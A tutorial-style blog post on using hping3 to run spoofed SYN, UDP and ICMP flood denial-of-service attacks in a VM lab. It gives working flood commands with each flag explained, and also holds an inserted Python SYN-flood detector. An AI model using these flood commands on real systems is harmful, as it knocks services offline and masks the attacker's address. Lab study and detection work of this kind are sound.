First of all, what is the hping command in Linux? hping is a command-line oriented TCP/IP packet assembler/analyzer. It has many uses in the world of IT security.
Uses of hping:
- Firewall Testing
- Advanced Port Scanning
- Network testing using different protocols
- Manual Path MTU discovery
- Advanced traceroute
- Remote OS fingerprinting
- Remote uptime guessing
- TCP/IP stack auditing
In this case, I will show the use of hping to perform a DDoS attack. Please note that in this example I use hping3, and all the commands are executed in a VM attacking another VM. The main command to use hping for DDoS is:
hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source (Victim IP)
-V : verbose mode, an option that provides additional details as to what the computer is doing and what drivers and software it is loading
-c : packet count (in this case the packet count is 1000000)
-d : data size, in this case the data size is 120
-S : set the SYN flag
-w : window size, in this case the window size is 64
-p : port, in this case the destination port is 445
-s : base source port, in this case the source port displayed will be port 445
--flood : flood mode, sends packets as fast as possible and does not show replies
--rand-source : random source address mode (spoofing)
This is the hping DDoS attack in action. In this screenshot you can see I made many mistakes in typing the first 5 commands, but this is a learning process, so mistakes will only make you better.
As you can see, the target OS (Windows XP SP3) process usage reaches 100%, which gives the victim a very heavy workload (slow PC, lagging).
This is the Wireshark preview on the target OS:
As you can see in the Wireshark log, there are massive numbers of connections to 192.168.5.129 (victim IP) from many sources, targeting port 445 of the target. In this case, the source is randomised by hping (using the --rand-source option). The default protocol while using hping DDoS is NBNS protocol.
However, hping can use other protocols for the attack, such as:
UDP : hping3 --flood --rand-source --udp -p 445 (Victim IP) <-- stated by the --udp option
ICMP : hping3 --flood --rand-source --icmp -p 445 (Victim IP) <-- stated by the --icmp option
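From the defender's side, the capture pattern described above (a burst of bare SYNs to one port from many randomized sources, each carrying data) can be flagged automatically. The Python sketch below is an added example, not part of the original post; the tcpdump-style sample lines, the thresholds and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

# tcpdump -n style TCP line: time, src.port > dst.port, flags, payload length
LINE = re.compile(
    r"^(\d+):(\d+):(\d+\.\d+) IP (\d+\.\d+\.\d+\.\d+)\.(\d+) > "
    r"(\d+\.\d+\.\d+\.\d+)\.(\d+): Flags \[([A-Z.]+)\].*?length (\d+)")

def parse(line):
    m = LINE.match(line)
    if not m:
        return None
    h, mi, s, src, _sport, dst, dport, flags, length = m.groups()
    return {"t": int(h) * 3600 + int(mi) * 60 + float(s), "src": src,
            "dst": (dst, int(dport)), "flags": flags, "len": int(length)}

def detect_syn_flood(lines, window=1.0, min_syns=100, min_sources=50):
    """Report, per destination, the busiest `window` seconds of bare SYNs
    when both the SYN count and the distinct-source count pass the thresholds."""
    syns = defaultdict(list)
    for pkt in filter(None, map(parse, lines)):
        if pkt["flags"] == "S":              # SYN without ACK: a new connection attempt
            syns[pkt["dst"]].append(pkt)
    alerts = []
    for dst, pkts in syns.items():
        pkts.sort(key=lambda p: p["t"])
        lo, best = 0, []
        for hi, pkt in enumerate(pkts):      # sliding time window over sorted SYNs
            while pkt["t"] - pkts[lo]["t"] > window:
                lo += 1
            if hi - lo + 1 > len(best):
                best = pkts[lo:hi + 1]
        sources = {p["src"] for p in best}
        if len(best) >= min_syns and len(sources) >= min_sources:
            alerts.append({"dst": dst, "syns": len(best), "sources": len(sources),
                           # data on a SYN is rare in normal traffic (the page's -d 120)
                           "syn_with_payload": sum(p["len"] > 0 for p in best)})
    return alerts

# Constructed sample capture: 200 SYNs from distinct sources in 0.2 s, then one normal handshake.
SAMPLE = [f"12:00:00.{i * 1000:06d} IP 10.{i}.{i * 7 % 250}.{i * 13 % 250 + 1}.{445 + i} > "
          f"192.168.5.129.445: Flags [S], seq {1000 + i}, win 64, length 120"
          for i in range(200)]
SAMPLE += [
    "12:00:01.500000 IP 192.168.5.10.50123 > 192.168.5.129.445: Flags [S], seq 1, win 64240, length 0",
    "12:00:01.500200 IP 192.168.5.129.445 > 192.168.5.10.50123: Flags [S.], seq 9, ack 2, win 64240, length 0",
    "12:00:01.500400 IP 192.168.5.10.50123 > 192.168.5.129.445: Flags [.], ack 10, win 64240, length 0",
]

if __name__ == "__main__":
    for alert in detect_syn_flood(SAMPLE):
        print(alert)
```

The single legitimate handshake in the sample does not raise an alert, because it falls outside the flood's time window and is far below both thresholds.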
That's all for this week. Hope this will help all of you out there who want to learn how to use hping to perform a DDoS attack.